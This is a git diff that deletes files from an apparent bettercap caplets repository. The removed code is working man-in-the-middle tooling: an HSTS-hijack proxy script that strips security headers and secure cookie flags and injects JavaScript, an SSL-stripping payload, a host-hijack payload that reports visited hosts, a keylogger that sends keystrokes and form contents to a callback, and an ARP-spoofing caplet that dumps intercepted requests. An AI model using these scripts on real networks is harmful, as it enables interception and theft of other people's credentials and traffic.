\n" +
- payload_container_prefix + injection + payload_container_suffix +
- "\n" +
- res.Body;
- }
- log_debug(on_blue + "hstshijack" + reset + " Injected document from " + bold + req.Hostname + reset + " for " + bold + req.Client.IP + reset);
- }
- }
-
- /* Spoof JavaScript bodies. */
- if (res.ContentType.match(selector_content_type_js)) {
- /* Block scripts. */
- for (a = 0; a < block_script_hosts.length; a++) {
- if (
- block_script_hosts[a] === "*"
- || req.Hostname.match(toWholeRegexpSet(block_script_hosts[a], "")[0])
- ) {
- res.Body = "";
- log_debug(on_blue + "hstshijack" + reset + " Cleared JavaScript resource from " + bold + req.Hostname + reset + ".");
- break;
- }
- }
-
- /* Inject payloads. */
- injection = "";
- for (a = 0; a < Object.keys(payloads).length; a++) {
- injecting_host = Object.keys(payloads)[a];
- if (
- injecting_host === "*"
- || req.Hostname.match(toWholeRegexpSet(injecting_host, "")[0])
- ) {
- injection = injection + payloads[injecting_host];
- }
- }
- if (injection !== "") {
- res.Body = payload_container_prefix + injection + payload_container_suffix + res.Body;
- log_debug(on_blue + "hstshijack" + reset + " Injected JavaScript file from " + bold + req.Hostname + reset + " for " + bold + req.Client.IP + reset);
- }
- }
-
- /* Strip SSL from location headers. */
- res.Headers = res.Headers
- .replace(selector_scheme_http_https_colon, "$1:")
- .replace(selector_port_https, "$1");
-
- /* Spoof hosts in headers. */
- for (a = 0; a < target_hosts.length; a++) {
- regexp_set = toRegexpSet(target_hosts[a], replacement_hosts[a]);
- res.Headers = res.Headers.replace(regexp_set[0], regexp_set[1]);
- }
-
- /* Remove secure cookie settings. */
- new_headers = "";
- res.Headers.split("\r\n").forEach(function(headerString){
- if (headerString !== "") {
- matches = headerString.match(selector_header);
- if (matches.length >= 3) {
- header_name = matches[1];
- header_value = matches[2];
- if (header_name.match(selector_header_set_cookie)) {
- new_header_value = "";
- cookie_params = header_value.split(";");
- cookie_params.forEach(function(cookie_param){
- if (cookie_param !== "") {
- stripped_cookie_param = cookie_param.match(selector_strip_whitespace)[1];
- if (!stripped_cookie_param.match(selector_header_set_cookie_secure_samesite)) {
- if (new_header_value === "") {
- new_header_value = stripped_cookie_param;
- } else {
- new_header_value += "; " + stripped_cookie_param;
- }
- }
- }
- });
- new_headers += header_name + ": " + new_header_value + "\r\n";
- } else {
- new_headers += header_name + ": " + header_value + "\r\n";
- }
- }
- }
- });
-
- /* Remove security headers. */
- res.Headers = res.Headers.replace(selector_header_csp, "");
- res.RemoveHeader("Strict-Transport-Security");
- res.RemoveHeader("Content-Security-Policy-Report-Only");
- res.RemoveHeader("Public-Key-Pins");
- res.RemoveHeader("Public-Key-Pins-Report-Only");
- res.RemoveHeader("X-Frame-Options");
- res.RemoveHeader("X-Content-Type-Options");
- res.RemoveHeader("X-Download-Options");
- res.RemoveHeader("X-Permitted-Cross-Domain-Policies");
- res.RemoveHeader("X-XSS-Protection");
- res.RemoveHeader("Expect-Ct");
-
- /* Set insecure headers. */
- allowed_origin = res.GetHeader("Access-Control-Allow-Origin", "*");
- if (allowed_origin !== "*") {
- for (a = 0; a < target_hosts.length; a++) {
- regexp_set = toRegexpSet(target_hosts[a], replacement_hosts[a]);
- if (allowed_origin.match(regexp_set[0])) {
- allowed_origin = allowed_origin.replace(regexp_set[0], regexp_set[1]);
- break;
- }
- }
- }
- res.SetHeader("Content-Security-Policy", "default-src * data: blob: filesystem: 'unsafe-inline' 'unsafe-eval'; worker-src * data: blob: filesystem: 'unsafe-inline' 'unsafe-eval'; script-src * data: blob: filesystem: 'unsafe-inline' 'unsafe-eval'; connect-src * data: blob: filesystem: 'unsafe-inline'; img-src * data: blob: filesystem: 'unsafe-inline'; frame-src * data: blob: filesystem: 'unsafe-inline'; object-src * data: blob: filesystem: 'unsafe-inline'; style-src * data: blob: filesystem: 'unsafe-inline'; report-uri x");
- res.SetHeader("X-WebKit-CSP", "default-src * data: blob: filesystem: 'unsafe-inline' 'unsafe-eval'; worker-src * data: blob: filesystem: 'unsafe-inline' 'unsafe-eval'; script-src * data: blob: filesystem: 'unsafe-inline' 'unsafe-eval'; connect-src * data: blob: filesystem: 'unsafe-inline'; img-src * data: blob: filesystem: 'unsafe-inline'; frame-src * data: blob: filesystem: 'unsafe-inline'; object-src * data: blob: filesystem: 'unsafe-inline'; style-src * data: blob: filesystem: 'unsafe-inline'; report-uri x");
- res.SetHeader("X-Content-Security-Policy", "default-src * data: blob: filesystem: 'unsafe-inline' 'unsafe-eval'; worker-src * data: blob: filesystem: 'unsafe-inline' 'unsafe-eval'; script-src * data: blob: filesystem: 'unsafe-inline' 'unsafe-eval'; connect-src * data: blob: filesystem: 'unsafe-inline'; img-src * data: blob: filesystem: 'unsafe-inline'; frame-src * data: blob: filesystem: 'unsafe-inline'; object-src * data: blob: filesystem: 'unsafe-inline'; style-src * data: blob: filesystem: 'unsafe-inline'; report-uri x");
- res.SetHeader("Access-Control-Allow-Credentials", "true");
- res.SetHeader("Access-Control-Allow-Origin", allowed_origin);
- res.SetHeader("Access-Control-Allow-Methods", "*");
- res.SetHeader("Access-Control-Allow-Headers", "*");
- res.SetHeader("Cache-Control", "no-cache, no-store, must-revalidate");
- res.SetHeader("Expires", "Fri, 20 Apr 2018 04:20:00 GMT");
- res.SetHeader("Pragma", "no-cache");
- }
-}
-
diff --git a/hstshijack/index.json b/hstshijack/index.json
deleted file mode 100644
index e69de29..0000000
diff --git a/hstshijack/payloads/google-search.js b/hstshijack/payloads/google-search.js
deleted file mode 100644
index d50be33..0000000
--- a/hstshijack/payloads/google-search.js
+++ /dev/null
@@ -1,23 +0,0 @@
-globalThis.addEventListener("DOMContentLoaded", function(){
- "use strict";
-
- if (location.pathname === "/search") {
- document.querySelectorAll("a").forEach(function(obf_var_link){
- if (obf_var_link.href && obf_var_link.href !== "") {
- var obf_var_container = document.createElement("obf_dummy");
- obf_var_container.append(obf_var_link.cloneNode(true))
- obf_var_container.addEventListener("click", function(e){
- e.preventDefault();
- location.href = obf_var_link.href;
- });
- obf_var_link.before(obf_var_container);
- obf_var_link.remove();
- }
- });
- }
-
- var obf_var_stylesheet = document.createElement("style");
- obf_var_stylesheet.innerText = `.gb_Pa{box-shadow:none}`;
- document.body.append(obf_var_stylesheet);
-});
-
diff --git a/hstshijack/payloads/hijack.js b/hstshijack/payloads/hijack.js
deleted file mode 100644
index 265eed8..0000000
--- a/hstshijack/payloads/hijack.js
+++ /dev/null
@@ -1,234 +0,0 @@
-/*
- Hooks XMLHttpRequest as well as 'a', 'form', 'script' and 'iframe' nodes.
- This payload is essential for hostname replacements.
-
- Remember that any occurrence of 'obf_path_ssl_log', 'obf_path_callback' and
- 'obf_path_whitelist' in this payload will be replaced when the proxy module
- loads and that variable names 'obf_var_target_hosts' and 'obf_var_replacement_hosts'
- are already declared before this is injected.
-*/
-
-(function(){
- "use strict";
-
- var obf_var_regex_one = /\-/g,
- obf_var_regex_two = /^\*./,
- obf_var_regex_three = /^\*\./,
- obf_var_regex_four = /\./g,
- obf_var_regex_five = /^\*\./,
- obf_var_regex_six = /\.\*$/,
- obf_var_regex_seven = /\.\*/g;
-
- globalThis.addEventListener("DOMContentLoaded", function(){
- "use strict";
-
- var obf_func_open = XMLHttpRequest.prototype.open,
- obf_var_XMLHttpRequest = new XMLHttpRequest(),
- obf_var_callback_log = [];
-
- function obf_func_toWholeRegexpSet(obf_var_selector_string, obf_var_replacement_string) {
- if (obf_var_selector_string.indexOf("*") != -1) {
- obf_var_selector_string = obf_var_selector_string.replace(obf_var_regex_one, "\\-");
- if (obf_var_selector_string.match(obf_var_regex_two)) {
- var obf_var_selector_string = obf_var_selector_string.replace(obf_var_regex_three, "((?:[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?.)+)"),
- obf_var_selector_string = obf_var_selector_string.replace(obf_var_regex_four, "\\."),
- obf_var_replacement_string = obf_var_replacement_string.replace(obf_var_regex_five, "");
- return [
- new RegExp("^" + obf_var_selector_string + "$", "ig"),
- "$1" + obf_var_replacement_string
- ];
- } else if (obf_var_selector_string.match(obf_var_regex_six)) {
- var obf_var_selector_string = obf_var_selector_string.replace(obf_var_regex_seven, "((?:.[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?)+)"),
- obf_var_selector_string = obf_var_selector_string.replace(obf_var_regex_four, "\\."),
- obf_var_replacement_string = obf_var_replacement_string.replace(obf_var_regex_six, "");
- return [
- new RegExp(obf_var_selector_string, "ig"),
- obf_var_replacement_string + "$1"
- ];
- }
- } else {
- var obf_var_selector_string = obf_var_selector_string.replace(obf_var_regex_four, "\\."),
- obf_var_selector_string = obf_var_selector_string.replace(/\-/g, "\\-");
- return [
- new RegExp("^" + obf_var_selector_string + "$", "ig"),
- obf_var_replacement_string
- ];
- }
- }
-
- function obf_func_parseURL(obf_var_url) {
- var obf_var_strippedURL = obf_var_url.replace(/^\s*(.*)\s*$/g, "$1"),
- obf_var_retval = ["","","","","",""];
- if (obf_var_strippedURL.match(/^((?:\w+:)?\/\/).*$/i)) {
- obf_var_retval[0] = obf_var_strippedURL.replace(/^((?:\w+:)?\/\/).*$/i, "$1");
- }
- if (obf_var_strippedURL.match(/^(?:(?:(?:\w+:)?\/\/)((?:[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\.)+(?:[a-z]{1,63}))(?:[:][1-9][0-9]{0,4})?)(?:[/][^/].*$|[/]$|[?#].*$|$)/i)) {
- obf_var_retval[1] = obf_var_strippedURL.replace(/^(?:(?:(?:\w+:)?\/\/)((?:[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\.)+(?:[a-z]{1,63}))(?:[:][1-9][0-9]{0,4})?)(?:[/][^/].*$|[/]$|[?#].*$|$)/i, "$1");
- }
- if (obf_var_strippedURL.match(/^(?:(?:(?:\w+:)?\/\/)?(?:(?:[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\.)+(?:[a-z]{1,63})))([:][1-9][0-9]{0,4}).*/i)) {
- obf_var_retval[2] = obf_var_strippedURL.replace(/^(?:(?:(?:\w+:)?\/\/)?(?:(?:[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\.)+(?:[a-z]{1,63})))([:][1-9][0-9]{0,4}).*$/i, "$1");
- }
- if (obf_var_strippedURL.match(/^(?:(?:\w+:)?\/\/(?:(?:[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\.)+(?:[a-z]{1,63}))(?:[:][1-9][0-9]{0,4})?)?([/][^?#]*).*/i)) {
- obf_var_retval[3] = obf_var_strippedURL.replace(/^(?:(?:\w+:)?\/\/)?[^/?#]*([/][^?#]*).*$/i, "$1");
- }
- if (obf_var_strippedURL.match(/^.*?([?][^#]*).*/i)) {
- obf_var_retval[4] = obf_var_strippedURL.replace(/^.*?([?][^#]*).*$/i, "$1");
- }
- if (obf_var_strippedURL.match(/^[^#]*([#].*)/i)) {
- obf_var_retval[5] = obf_var_strippedURL.replace(/^[^#]*([#].*)/i, "$1");
- }
- return obf_var_retval;
- }
-
- function obf_func_callback(obf_var_host) {
- for (
- var obf_var_i = 0;
- obf_var_i < obf_var_callback_log.length;
- obf_var_i++
- ) {
- if (obf_var_callback_log[i] == obf_var_host) {
- return;
- }
- }
- obf_var_callback_log.push(obf_var_host);
- var obf_var_req = obf_var_XMLHttpRequest;
- obf_var_req.open(
- "GET",
- "http://obf_random_host/obf_path_ssl_log?" + obf_var_host,
- true);
- obf_var_req.send();
- }
-
- function obf_func_hijack(obf_var_host) {
- for (
- var obf_var_i = 0;
- obf_var_i < obf_var_target_hosts.length;
- obf_var_i++
- ) {
- var obf_var_whole_regexp_set = obf_func_toWholeRegexpSet(
- obf_var_target_hosts[obf_var_i],
- obf_var_replacement_hosts[obf_var_i]);
- if (obf_var_host.match(obf_var_whole_regexp_set[0])) {
- obf_var_host = obf_var_host.replace(
- obf_var_whole_regexp_set[0],
- obf_var_whole_regexp_set[1]);
- break;
- }
- }
- return obf_var_host;
- }
-
- function obf_func_hook_XMLHttpRequest() {
- XMLHttpRequest.prototype.open = function(
- obf_var_method,
- obf_var_url,
- obf_var_async,
- obf_var_username,
- obf_var_password
- ) {
- var obf_var_parsed_url = obf_func_parseURL(obf_var_url),
- obf_var_hijacked_host = obf_func_hijack(obf_var_parsed_url[1]);
- if (obf_var_hijacked_host != obf_var_parsed_url[1]) {
- if (obf_var_parsed_url[0].toLowerCase() === "https://") {
- obf_var_parsed_url[0] = obf_var_parsed_url[0].replace(/(http)s:\/\//i, "$1://");
- }
- if (obf_var_parsed_url[2] === ":443") {
- obf_var_parsed_url[2] = "";
- }
- }
- obf_var_url = obf_var_parsed_url[0] +
- obf_var_hijacked_host +
- obf_var_parsed_url[2] +
- obf_var_parsed_url[3] +
- obf_var_parsed_url[4] +
- obf_var_parsed_url[5];
- return obf_func_open.apply(this, arguments);
- }
- }
-
- function obf_func_hook_nodes() {
- document.querySelectorAll("a,form,script,iframe").forEach(function(obf_var_node){
- try {
- var obf_var_url = "";
- switch (obf_var_node.tagName) {
- case "A":
- obf_var_node.href
- ? obf_var_url = obf_var_node.href
- : "";
- break;
- case "FORM":
- obf_var_node.action
- ? obf_var_url = obf_var_node.action
- : "";
- break;
- case "SCRIPT":
- obf_var_node.src
- ? obf_var_url = obf_var_node.src
- : "";
- break;
- case "IFRAME":
- obf_var_node.src
- ? obf_var_url = obf_var_node.src
- : "";
- break;
- }
- if (obf_var_url.match(/^\s*(?:http[s]?:)?\/\/[^:/?#]+/i)) {
- var obf_var_parsed_url = obf_func_parseURL(obf_var_url),
- obf_var_hijacked_host = obf_func_hijack(obf_var_parsed_url[1]);
- if (obf_var_hijacked_host != obf_var_parsed_url[1]) {
- if (obf_var_parsed_url[0].toLowerCase() === "https://") {
- obf_var_parsed_url[0] = obf_var_parsed_url[0].replace(/(http)s:\/\//i, "$1://");
- }
- if (obf_var_parsed_url[2] === ":443") {
- obf_var_parsed_url[2] = "";
- }
- }
- var obf_var_hijacked_url = obf_var_parsed_url[0] +
- obf_var_hijacked_host +
- obf_var_parsed_url[2] +
- obf_var_parsed_url[3] +
- obf_var_parsed_url[4] +
- obf_var_parsed_url[5];
- switch (obf_var_node.tagName) {
- case "A":
- if (obf_var_node.href) {
- obf_var_node.href = obf_var_hijacked_url;
- }
- break;
- case "FORM":
- if (obf_var_node.action) {
- obf_var_node.action = obf_var_hijacked_url;
- }
- break;
- case "SCRIPT":
- if (obf_var_node.src) {
- obf_var_node.src = obf_var_hijacked_url;
- }
- break;
- case "IFRAME":
- if (obf_var_node.src) {
- obf_var_node.src = obf_var_hijacked_url;
- }
- break;
- }
- obf_func_callback(obf_var_parsed_url[1].toLowerCase());
- }
- } catch(obf_var_ignore) {}
- });
- }
-
- try {
- obf_func_hook_XMLHttpRequest();
- } catch(obf_var_ignore) {}
-
- try {
- setInterval(obf_func_hook_nodes, 2000);
- obf_func_hook_nodes();
- } catch(obf_var_ignore) {}
-
- try {
- globalThis.addEventListener("load", obf_func_hook_nodes);
- } catch(obf_var_ignore) {}
- });
-})();
-
diff --git a/hstshijack/payloads/keylogger.js b/hstshijack/payloads/keylogger.js
deleted file mode 100644
index 2f9f00d..0000000
--- a/hstshijack/payloads/keylogger.js
+++ /dev/null
@@ -1,141 +0,0 @@
-/*
- Hooks the keyup event and onsubmit events of forms and disables form autocompletion.
-
- Remember that any occurrence of 'obf_path_ssl_log', 'obf_path_callback' and
- 'obf_path_whitelist' in this payload will be replaced when the proxy module
- loads and that variable names 'obf_var_target_hosts' and 'obf_var_replacement_hosts'
- are already declared before this is injected.
-*/
-
-
-(function(){
- "use strict";
-
- var obf_var_keystrokes = [];
-
- function obf_func_random_string(obf_var_length) {
- var obf_var_chars = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz",
- obf_var_buff = new Array(obf_var_length);
- for (var obf_var_i = 0; obf_var_i < obf_var_length; obf_var_i++) {
- obf_var_buff[obf_var_i] = obf_var_chars.charAt(parseInt(Math.random() * obf_var_chars.length));
- }
- return obf_var_buff.join("");
- }
-
- function obf_func_callback() {
- try {
- var obf_var_inputs = document.getElementsByTagName("input"),
- obf_var_textareas = document.getElementsByTagName("textarea"),
- obf_var_params = "";
-
- for (var obf_var_i = 0; obf_var_i < obf_var_inputs.length; obf_var_i++) {
- if (obf_var_inputs[obf_var_i].value != "") {
- obf_var_params += encodeURIComponent(obf_var_inputs[obf_var_i].name) +
- "=" + encodeURIComponent(obf_var_inputs[obf_var_i].value) +
- (obf_var_i < (obf_var_inputs.length-1) ? "&" : "");
- }
- }
- for (var obf_var_i = 0; obf_var_i < obf_var_textareas.length; obf_var_i++) {
- if (obf_var_textareas[obf_var_i].value != "") {
- obf_var_params += encodeURIComponent(obf_var_textareas[obf_var_i].name) +
- "=" + encodeURIComponent(obf_var_textareas[obf_var_i].value) +
- (obf_var_i < (obf_var_textareas.length-1) ? "&" : "");
- }
- }
- if (obf_var_params !== "") {
- obf_var_params += "&";
- }
- obf_var_params += "obf_var_keystrokes=" + encodeURIComponent(obf_var_keystrokes.join(","));
-
- if (obf_var_params.length > 0) {
- var obf_var_req = new XMLHttpRequest();
- obf_var_req.open(
- "POST",
- "http://" + location.host + "obf_path_callback?" + obf_var_params,
- true);
- obf_var_req.send();
- }
- } catch(obf_var_ignore){}
- }
-
- function obf_func_callback_whitelist() {
- try {
- var obf_var_inputs = document.getElementsByTagName("input"),
- obf_var_textareas = document.getElementsByTagName("textarea"),
- obf_var_params = "";
-
- for (var obf_var_i = 0; obf_var_i < obf_var_inputs.length; obf_var_i++) {
- if (obf_var_inputs[obf_var_i].value != "") {
- obf_var_params += encodeURIComponent(obf_var_inputs[obf_var_i].name) +
- "=" + encodeURIComponent(obf_var_inputs[obf_var_i].value) +
- (obf_var_i < (obf_var_inputs.length-1) ? "&" : "");
- }
- }
- for (var obf_var_i = 0; obf_var_i < obf_var_textareas.length; obf_var_i++) {
- if (obf_var_textareas[obf_var_i].value != "") {
- obf_var_params += encodeURIComponent(obf_var_textareas[obf_var_i].name) +
- "=" + encodeURIComponent(obf_var_textareas[obf_var_i].value) +
- (obf_var_i < (obf_var_textareas.length-1) ? "&" : "");
- }
- }
-
- if (obf_var_params.length > 0) {
- var obf_var_req = new XMLHttpRequest();
- obf_var_req.open(
- "POST",
- "http://" + location.host + "obf_path_whitelist?" + obf_var_params,
- true);
- obf_var_req.send();
- }
- } catch(obf_var_ignore){}
- }
-
- function obf_func_hook_keyup() {
- globalThis.addEventListener("keydown", function(obf_var_event) {
- try {
- obf_var_keystrokes.push(obf_var_event.key);
- obf_func_callback();
- } catch(obf_var_ignore){}
- });
- }
-
- function obf_func_hook_forms() {
- document.querySelectorAll("form").forEach(function(obf_var_form){
- // if (obf_var_form.querySelector("input[type=password]")) {
- // obf_var_form.addEventListener("submit", obf_func_callback_whitelist);
- // } else {
- obf_var_form.addEventListener("submit", obf_func_callback);
- // }
- });
- }
-
- function obf_func_hook_inputs() {
- document.querySelectorAll("input").forEach(function(obf_var_input){
- obf_var_input.autocomplete = "off";
- });
- }
-
- var obf_var_hooked_tag = obf_func_random_string(parseInt(8 + Math.random() * 8));
-
- try {
- obf_func_hook_keyup();
- } catch(obf_var_ignore){}
-
- try {
- obf_func_hook_forms();
- } catch(obf_var_ignore){}
-
- try {
- obf_func_hook_inputs();
- } catch(obf_var_ignore){}
-
- try {
- globalThis.addEventListener("DOMContentLoaded", obf_func_hook_forms);
- globalThis.addEventListener("DOMContentLoaded", obf_func_hook_inputs);
- globalThis.addEventListener("load", obf_func_hook_forms);
- globalThis.addEventListener("load", obf_func_hook_inputs);
- setInterval(obf_func_hook_forms, 2000);
- setInterval(obf_func_hook_inputs, 2000);
- } catch(obf_var_ignore){}
-})();
-
diff --git a/hstshijack/payloads/sslstrip.js b/hstshijack/payloads/sslstrip.js
deleted file mode 100644
index 79655fd..0000000
--- a/hstshijack/payloads/sslstrip.js
+++ /dev/null
@@ -1,72 +0,0 @@
-/*
- Hooks XMLHttpRequest as well as 'a', 'form', 'script' & 'iframe' nodes.
-
- Remember that any occurrence of 'obf_path_ssl_log', 'obf_path_callback' and
- 'obf_path_whitelist' in this payload will be replaced when the proxy module
- loads and that variable names 'obf_var_target_hosts' and 'obf_var_replacement_hosts'
- are already declared before this is injected.
-*/
-
-(function(){
- "use strict";
-
- var obf_func_open = XMLHttpRequest.prototype.open;
-
- function obf_func_hook_XMLHttpRequest() {
- XMLHttpRequest.prototype.open = function(
- obf_var_method,
- obf_var_url,
- obf_var_async,
- obf_var_username,
- obf_var_password
- ) {
- var obf_var_url = obf_var_url.replace(/(http)s/ig, "$1");
- return obf_func_open.apply(this, arguments);
- }
- }
-
- function obf_func_hook_nodes() {
- document.querySelectorAll("a,iframe,script,form").forEach(function(obf_var_node){
- try {
- switch (obf_var_node.tagName) {
- case "A":
- if (obf_var_node.href && obf_var_node.href.match(/^\s*https:/i)) {
- obf_var_node.href = obf_var_node.href.replace(/(http)s/i, "$1");
- }
- break;
- case "IFRAME":
- if (obf_var_node.src && obf_var_node.src.match(/^\s*https:/i)) {
- obf_var_node.src = obf_var_node.src.replace(/(http)s/i, "$1");
- }
- break;
- case "SCRIPT":
- if (obf_var_node.src && obf_var_node.src.match(/^\s*https:/i)) {
- obf_var_node.src = obf_var_node.src.replace(/(http)s/i, "$1");
- }
- break;
- case "FORM":
- if (obf_var_node.action && obf_var_node.action.match(/^\s*https:/i)) {
- obf_var_node.action = obf_var_node.action.replace(/(http)s/i, "$1");
- }
- break;
- }
- } catch(obf_var_ignore) {}
- });
- }
-
- try {
- obf_func_hook_XMLHttpRequest();
- } catch(obf_var_ignore) {}
-
- try {
- obf_func_hook_nodes();
- } catch(obf_var_ignore) {}
-
- try {
- obf_func_hook_XMLHttpRequest();
- globalThis.addEventListener("DOMContentLoaded", obf_func_hook_nodes);
- globalThis.addEventListener("load", obf_func_hook_nodes);
- setInterval(obf_func_hook_nodes, 4000);
- } catch(obf_var_ignore) {}
-})();
-
diff --git a/http-req-dump/http-req-dump.cap b/http-req-dump/http-req-dump.cap
deleted file mode 100644
index 18ed59f..0000000
--- a/http-req-dump/http-req-dump.cap
+++ /dev/null
@@ -1,27 +0,0 @@
-# targeting the whole subnet by default, to make it selective:
-#
-# sudo ./bettercap -caplet http-req-dump.cap -eval "set arp.spoof.targets 192.168.1.64"
-
-# to make it less verbose
-# events.stream off
-
-# discover a few hosts
-net.probe on
-sleep 1
-net.probe off
-
-# uncomment to enable sniffing too
-# set net.sniff.verbose false
-# set net.sniff.local true
-# set net.sniff.filter tcp port 443
-# net.sniff on
-
-# we'll use this proxy script to dump requests
-set https.proxy.script http-req-dump.js
-set http.proxy.script http-req-dump.js
-clear
-
-# go ^_^
-http.proxy on
-https.proxy on
-arp.spoof on
diff --git a/http-req-dump/http-req-dump.js b/http-req-dump/http-req-dump.js
deleted file mode 100644
index ac8e996..0000000
--- a/http-req-dump/http-req-dump.js
+++ /dev/null
@@ -1,222 +0,0 @@
-var RESET = "\033[0m";
-
-function R(s) {
- return "\033[31m" + s + RESET;
-}
-
-function G(s) {
- return "\033[32m" + s + RESET;
-}
-
-function B(s) {
- return "\033[34m" + s + RESET;
-}
-
-function Y(s) {
- return "\033[33m" + s + RESET;
-}
-
-function BLACK_BLUE(s) {
- return "\033[104;30m" + s + RESET;
-}
-
-function BLACK_RED(s) {
- return "\033[41;30m" + s + RESET;
-}
-
-function DIM(s) {
- return "\033[2m" + s + RESET;
-}
-
-function GREY(s) {
- return "\033[30m" + s + RESET;
-}
-
-function BOLD(s) {
- return "\033[1m" + s + RESET;
-}
-
-function dumpHeaders(req) {
- headers = req.Headers.replace(/\r\n$/g, "").split("\r\n");
-
- msg = "\n " + BOLD("Headers") + "\n\n";
-
- for (var i = 0; i < headers.length; i++) {
- header_name = headers[i].replace(/:.*/, "");
- header_value = headers[i].replace(/.*?: /, "");
-
- msg += " " + G(header_name) + " => " + BOLD(header_value) + "\n";
- }
-
- console.log(msg);
-}
-
-function dumpPlain(req) {
- body = req.ReadBody();
-
- if (req.Body.length > 0) {
- console.log(" " + BOLD("Text") + "\n\n " + Y(body) + "\n");
- }
-}
-
-function dumpForm(req) {
- form = req.ParseForm();
-
- if (Object.keys(form).length > 0) {
- msg = " " + BOLD("Form") + "\n\n";
-
- for (var key in form) {
- msg += " " + B(strip(key)) + " : " + Y(strip(form[key])) + "\n";
- }
-
- console.log(msg);
- }
-}
-
-function dumpQuery(req) {
- params = req.Query.split("&");
-
- msg = " " + BOLD("Query") + "\n\n";
-
- for (var i = 0; i < params.length; i++) {
- param_name = params[i].split("=")[0];
- param_value = params[i].split("=")[1];
-
- if (param_name != undefined && param_value != undefined && param_name.length > 0 && param_value.length > 0) {
- try {
- msg += " " + B(strip(decodeURIComponent(param_name))) + " : " + Y(strip(decodeURIComponent(param_value))) + "\n";
- } catch(err) {
- msg += " " + B(strip(param_name)) + " : " + Y(strip(param_value)) + "\n";
- log_debug("could not decode URI parameter: " + err);
- }
- } else {
- if (params[i].length > 0) {
- try {
- msg += " " + Y(strip(decodeURIComponent(params[i]))) + "\n";
- } catch(err) {
- msg += " " + Y(strip(params[i])) + "\n";
- log_debug("could not decode URI parameter: " + err);
- }
- }
- }
- }
-
- console.log(msg);
-}
-
-function dumpJSON(req) {
- msg = " " + BOLD("JSON") + "\n\n";
-
- var body = req.ReadBody();
-
- if (req.Body.length > 0) {
- try {
- json = JSON.parse(body);
- json_msg = JSON.stringify(json, null, 4);
-
- msg_lines = json_msg.split("\n");
-
- for (var i = 0; i < msg_lines.length; i++) {
- msg += " " + msg_lines[i].replace(/^(\s*)\{$/, "$1" + B("{"))
- .replace(/^(\s*)\[$/, "$1" + B("["))
- .replace(/^(\s*)(".*?"): \{$/, "$1" + B("$2") + ": " + B("{"))
- .replace(/^(\s*)(".*?"): \[$/, "$1" + B("$2") + ": " + B("["))
- .replace(/^(\s*)(".*?"): (.*?)(,$|$)/, "$1" + B("$2") + ": " + Y("$3") + "$4")
- .replace(/^(\s*)(".*?")(,$|$)/, "$1" + Y("$2") + "$3")
- .replace(/^(\s*)(\d*?)(,$|$)/, "$1" + Y("$2") + "$3")
- .replace(/^(\s*)\](,$|$)/, "$1" + B("]") + "$2")
- .replace(/^(\s*)\}(,$|$)/, "$1" + B("}") + "$2") + "\n";
- }
- } catch(ignore) {
- msg += " " + Y(body) + "\n";
- }
-
- console.log(msg);
- }
-}
-
-function dumpHex(raw) {
- var DataSize = raw.length;
- var Bytes = 16;
-
- msg = "";
-
- for (var address = 0; address < DataSize; address++) {
- var saddr = pad(address, 8, "0");
- var shex = "";
- var sprint = "";
-
- var end = address + Bytes;
- for (var i = address; i < end; i++) {
- if (i < DataSize) {
- shex += toHex(raw.charCodeAt(i)) + " ";
- sprint += isPrint(raw[i]) ? raw[i] : ".";
- } else {
- shex += " ";
- sprint += " ";
- }
- }
-
- address = end;
-
- msg += " " + G(saddr) + " " + shex + " " + sprint + "\n";
- }
-
- console.log(msg);
-}
-
-function dumpRaw(req) {
- var body = req.ReadBody();
-
- if (body.length > 0) {
- console.log(" " + BOLD("Body") + " " + DIM("(" + body.length + " bytes)") + "\n");
-
- dumpHex(body);
- }
-}
-
-function pad(num, size, fill) {
- var s = "" + num;
-
- while (s.length < size) {
- s = fill + s;
- }
-
- return s;
-}
-
-function strip(s) {
- return s.replace(/^\s*/, "").replace(/\s*$/, "");
-}
-
-function toHex(n) {
- var hex = "0123456789abcdef";
- var h = hex[(0xF0 & n) >> 4] + hex[0x0F & n];
- return pad(h, 2, "0");
-}
-
-function isPrint(c) {
- if (!c) { return false; }
- var code = c.charCodeAt(0);
- return (code > 31) && (code < 127);
-}
-
-function onRequest(req, res) {
- log("[" + G("http-req-dump") + "] " + BLACK_RED(req.Scheme) + " " + req.Client.IP + " " + BLACK_BLUE(req.Method) + " " + GREY(req.Scheme + "://") + Y(req.Hostname) + req.Path + (req.Query != "" ? GREY("?" + req.Query) : ""));
-
- dumpHeaders(req);
-
- if (req.Query.length > 0) {
- dumpQuery(req);
- }
-
- if (req.ContentType.indexOf("text/plain") != -1) {
- dumpPlain(req);
- } else if (req.ContentType.indexOf("application/x-www-form-urlencoded") != -1) {
- dumpForm(req);
- } else if (req.ContentType.indexOf("application/json") != -1) {
- dumpJSON(req);
- } else {
- dumpRaw(req);
- }
-}
diff --git a/http-ui.cap b/http-ui.cap
deleted file mode 100644
index bb64c8e..0000000
--- a/http-ui.cap
+++ /dev/null
@@ -1,15 +0,0 @@
-# api listening on http://127.0.0.1:8081/ and ui to http://127.0.0.1
-set api.rest.address 127.0.0.1
-set api.rest.port 8081
-set http.server.address 127.0.0.1
-set http.server.port 80
-# default installation path of the ui
-set http.server.path /usr/local/share/bettercap/ui
-
-# !!! CHANGE THESE !!!
-set api.rest.username user
-set api.rest.password pass
-
-# go!
-api.rest on
-http.server on
diff --git a/https-ui.cap b/https-ui.cap
deleted file mode 100644
index 81aaf3a..0000000
--- a/https-ui.cap
+++ /dev/null
@@ -1,21 +0,0 @@
-# api listening on https://0.0.0.0:8083/ and ui on https://0.0.0.0
-set api.rest.address 0.0.0.0
-set api.rest.port 8083
-set https.server.address 0.0.0.0
-set https.server.port 443
-
-# make sure both use the same https certificate so api requests won't fail
-set https.server.certificate ~/.bettercap-https.cert.pem
-set https.server.key ~/.bettercap-https.key.pem
-set api.rest.certificate ~/.bettercap-https.cert.pem
-set api.rest.key ~/.bettercap-https.key.pem
-# default installation path of the ui
-set https.server.path /usr/local/share/bettercap/ui
-
-# !!! CHANGE THESE !!!
-set api.rest.username user
-set api.rest.password pass
-
-# go!
-api.rest on
-https.server on
diff --git a/jsinject/README.md b/jsinject/README.md
deleted file mode 100644
index 68d1ab9..0000000
--- a/jsinject/README.md
